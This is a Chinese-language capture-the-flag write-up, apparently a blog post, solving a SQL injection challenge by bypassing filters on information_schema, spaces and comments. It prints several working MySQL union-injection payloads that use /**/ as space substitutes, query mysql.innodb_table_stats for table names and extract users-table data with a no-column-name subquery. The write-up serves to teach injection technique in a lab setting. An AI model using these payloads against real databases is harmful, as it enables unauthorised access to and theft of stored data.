本文讲述了在SQL注入中遇到information_schema受限时,如何利用InnoDB表统计信息和无列名注入技巧,通过`mysql.innodb_table_stats`获取数据库表结构。详细探讨了payload构建和利用innodb_table_stats获取22列信息的过程。
好久没做sql的题了,来巩固一下。
这里试了一下,无论怎么输入都是显示的登录失败,那注册一个账号看看。登录过后有一个申请发布广告,点进去。
这个格式让我想到了xss和sql,xss试了一下的确是存在的,但是应该不是获取cookie登录后台,看一看sql注入会不会要简单点。
单输入一个单引号,看广告详情
可以,存在sql注入漏洞
fuzz一下,information_schema被过滤,or被过滤,空格被过滤,#也被过滤。
联合注入空格可以用/**/,order by可以用group by代替,但我喜欢直接union select试有多少个字段,最后用单引号闭合最后的单引号。但是information_schema被过滤,双写大小写也试过了,怎么办呢?引入一个知识点:
在我们进行sql注入的时候,有时候information_schema这个库可能会因为过滤而无法调用,这时我们就不能通过这个库来查出表名和列名。不过我们可以通过两种方法来查出表名:
InnoDb引擎
从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。
sys数据库
在5.7以上的MYSQL中,新增了sys数据库,该库的基础数据来自information_schema和performance_chema,其本身不存储数据。可以通过其中的schema_auto_increment_columns来获取表名。但是上述两种方法都只能查出表名,无法查到列名,这时我们就要用到无列名注入了。无列名注入,顾名思义,就是不需要列名就能注出数据的注入。
注:sys库需要root权限才能访问。innodb在mysql中是默认关闭的。
试出来最后有22列,回显位为2和3。这里点击广告详情是有显示的应该是2次注入,存进数据库后又从数据库里拿出来,试了试sys库打不开,用innodb试试,没办法,因为报不出列名,就只能无列名注入
payload:1'union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()&&'1'='1
或者用子查询1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
注意这里select查询的是只能是单列information_schema.tables用mysql.innodb_table_stats代替
table_schema用database_name代替
构造payload
1'/**/union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
因为他是列查询,所以里面的子查询也要显示列的,而且1.2.3要和*的个数相同,比如users里面有4列前面就应该是1,2,3,4,这个是1,2,3是试出来的。最后把第三列提出来可以看到flag。
扫一扫
738
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
